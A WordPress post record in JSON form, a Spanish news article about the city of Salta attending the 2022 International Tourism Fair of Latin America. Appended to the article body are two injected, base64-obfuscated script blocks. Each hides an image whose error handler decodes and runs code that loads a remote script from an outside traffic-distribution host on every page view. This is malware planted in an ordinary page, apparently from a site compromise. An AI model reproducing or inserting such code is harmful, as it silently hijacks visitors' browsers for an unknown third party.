{"id":1556,"date":"2022-09-27T18:08:14","date_gmt":"2022-09-27T21:08:14","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1556"},"modified":"2025-08-14T00:34:15","modified_gmt":"2025-08-14T03:34:15","slug":"la-ciudad-de-salta-estara-presente-en-la-feria-internacional-de-turismo-de-america-latina","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1556","title":{"rendered":"La ciudad de Salta estar\u00e1 presente en la Feria Internacional de Turismo de Am\u00e9rica Latina"},"content":{"rendered":"\n<h5 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#ca0c3b\"><strong><em>Ser\u00e1 del 1 al 4 de octubre, en el pabell\u00f3n Nacional del predio de la Rural de Palermo. El mundo conocer\u00e1 las propuestas del municipio, entre ellas la Semana Gastron\u00f3mica \u00abSalta la Olla\u00bb y \u00abSalta, Ciudad de las Pe\u00f1as\u00bb.<\/em><\/strong><\/h5>\n\n\n\n<p>La Municipalidad de Salta, a trav\u00e9s de la Secretar\u00eda de Cultura y Turismo, estar\u00e1 presente del 1 al 4 de octubre en la edici\u00f3n n\u00famero 26 de la Feria Internacional de Turismo \u2013 FIT. Se trata del encuentro m\u00e1s importante de turismo de Latinoam\u00e9rica, y uno de los cinco m\u00e1s relevantes del mundo, que se realiza en la Rural de Palermo en la ciudad de Buenos Aires.<\/p>\n\n\n\n<p>Igual que el a\u00f1o pasado, la participaci\u00f3n este 2022,&nbsp; ser\u00e1 con un stand propio dentro del pabell\u00f3n Nacional. Esto permitir\u00e1 contar sobre la ciudad en cada circuito desde lo hist\u00f3rico-cultural pasando por lo gastron\u00f3mico y lo natural. Tambi\u00e9n se podr\u00e1 vivir parte de las experiencias con las que se cuenta dentro de la urbe.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"626\" data-id=\"1557\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/fit-facundo-1024x626.png\" alt=\"\" class=\"wp-image-1557\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/fit-facundo-1024x626.png 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/fit-facundo-300x183.png 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/fit-facundo-768x469.png 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/fit-facundo-696x425.png 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/fit-facundo-1068x653.png 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/fit-facundo-687x420.png 687w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/fit-facundo.png 1119w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"1024\" data-id=\"1558\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/whatsapp-image-2022-09-26-at-160054-1024x1024.jpeg\" alt=\"\" class=\"wp-image-1558\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/whatsapp-image-2022-09-26-at-160054-1024x1024.jpeg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/whatsapp-image-2022-09-26-at-160054-300x300.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/whatsapp-image-2022-09-26-at-160054-150x150.jpeg 150w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/whatsapp-image-2022-09-26-at-160054-768x768.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/whatsapp-image-2022-09-26-at-160054-696x696.jpeg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/whatsapp-image-2022-09-26-at-160054-1068x1068.jpeg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/whatsapp-image-2022-09-26-at-160054-420x420.jpeg 420w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/whatsapp-image-2022-09-26-at-160054.jpeg 1280w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"954\" height=\"897\" data-id=\"1559\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/salta-cabildo-drone-ok.jpg\" alt=\"\" class=\"wp-image-1559\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/salta-cabildo-drone-ok.jpg 954w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/salta-cabildo-drone-ok-300x282.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/salta-cabildo-drone-ok-768x722.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/salta-cabildo-drone-ok-696x654.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/09\/salta-cabildo-drone-ok-447x420.jpg 447w\" sizes=\"(max-width: 954px) 100vw, 954px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>En el marco de la feria, la ciudad de Salta firmar\u00e1 convenios con distintas empresas, instituciones tur\u00edsticas y municipios, con la finalidad de afianzar v\u00ednculos y generar herramientas para el desarrollo y la promoci\u00f3n de Salta.<\/p>\n\n\n\n<p>Tambi\u00e9n se realizar\u00e1 la presentaci\u00f3n de la Semana Gastron\u00f3mica \u00abSalta la Olla\u00bb que se realiza de manera conjunta con la C\u00e1mara Hotelera, Gastron\u00f3mica y Afines y FEGHRA y en el marco del producto \u00abSalta,&nbsp; Ciudad de las Pe\u00f1as\u00bb se realizar\u00e1 un homenaje a la Madre de las Pe\u00f1as el reconocido mundialmente Boliche Balderrama.<\/p>\n\n\n\n<p>\u00abSe viene trabajando en la consolidaci\u00f3n de la ciudad de Salta como un destino tur\u00edstico l\u00edder y protagonista a nivel pa\u00eds y en la regi\u00f3n y es por eso que se articula con distintos mercados. Este a\u00f1o estaremos&nbsp; nuevamente presentes en la Feria Internacional del Turismo entendiendo el rol que tiene el municipio en el turismo nacional y marcando el liderazgo que tiene en materia tur\u00edstica. Se va a generar una fuerte acci\u00f3n de promoci\u00f3n con la cual se mostrar\u00e1 lo que es el turismo en Salta\u00bb, expres\u00f3 el secretario de Cultura y Turismo municipal, Fernando Garc\u00eda Soria.<\/p>\n\n\n\n<p><strong>Sobre&nbsp; la Feria Internacional de Turismo de Am\u00e9rica Latina 2022 (FIT)<\/strong><\/p>\n\n\n\n<p>En este 2022, del 1 al 4 de octubre se realizar\u00e1, en el predio ferial La Rural, la edici\u00f3n n\u00famero 26 de FIT (Feria Internacional de Turismo de Am\u00e9rica Latina), uno de los encuentros de turismo m\u00e1s relevantes a nivel mundial. La feria ya cuenta con 40 pa\u00edses participantes de todas las latitudes del mundo y las 24 provincias argentinas para ofrecer los distintivos tur\u00edsticos de cada destino.<\/p>\n\n\n\n<p>Durante el s\u00e1bado 1 y domingo 2 de octubre de 14 a 21, FIT estar\u00e1 abierta al p\u00fablico en general, que podr\u00e1 disfrutar de degustaciones, espect\u00e1culos y actividades de nuestro pa\u00eds y el mundo.<\/p>\n\n\n\n<p>El lunes 3 y martes 4, abre sus puertas exclusivamente para profesionales del sector, de 10 a 19. Sumando distintas opciones de comercializaci\u00f3n con las cl\u00e1sicas Rondas de Negocios FIT -que se realizan en un pabell\u00f3n especial y con nuevo formato para optimizar tiempos, confort y resultados- y ofreciendo oportunidades de crecimiento e intercambio para todos los actores del sector.<\/p>\n\n\n\n<p>Adem\u00e1s, durante las jornadas del 3 y 4 de octubre se brindar\u00e1n conferencias con speakers de todo el mundo sobre Innovaci\u00f3n, Tecnolog\u00eda, Hospitality y problem\u00e1ticas globales del turismo. FIT contar\u00e1, adem\u00e1s, con 6 Auditorios destinados a charlas y capacitaciones de inter\u00e9s para el sector tur\u00edstico.<\/p>\n\n\n\n<p>La tecnolog\u00eda tendr\u00e1 un lugar destacado dentro de la Feria con FIT TECH, un espacio \u00fanico en donde confluyen las nuevas tendencias y las herramientas para fomentar el crecimiento de la industria.<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Ser\u00e1 del 1 al 4 de octubre, en el pabell\u00f3n Nacional del predio de la Rural de Palermo. El mundo conocer\u00e1 las propuestas del municipio, entre ellas la Semana Gastron\u00f3mica \u00abSalta la Olla\u00bb y \u00abSalta, Ciudad de las Pe\u00f1as\u00bb. La Municipalidad de Salta, a trav\u00e9s de la Secretar\u00eda de Cultura y Turismo, estar\u00e1 presente del [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1558,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[16],"tags":[],"class_list":{"0":"post-1556","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-ferias-y-congresos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1556"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1556"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1556\/revisions"}],"predecessor-version":[{"id":7333,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1556\/revisions\/7333"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1558"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1556"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1556"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1556"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}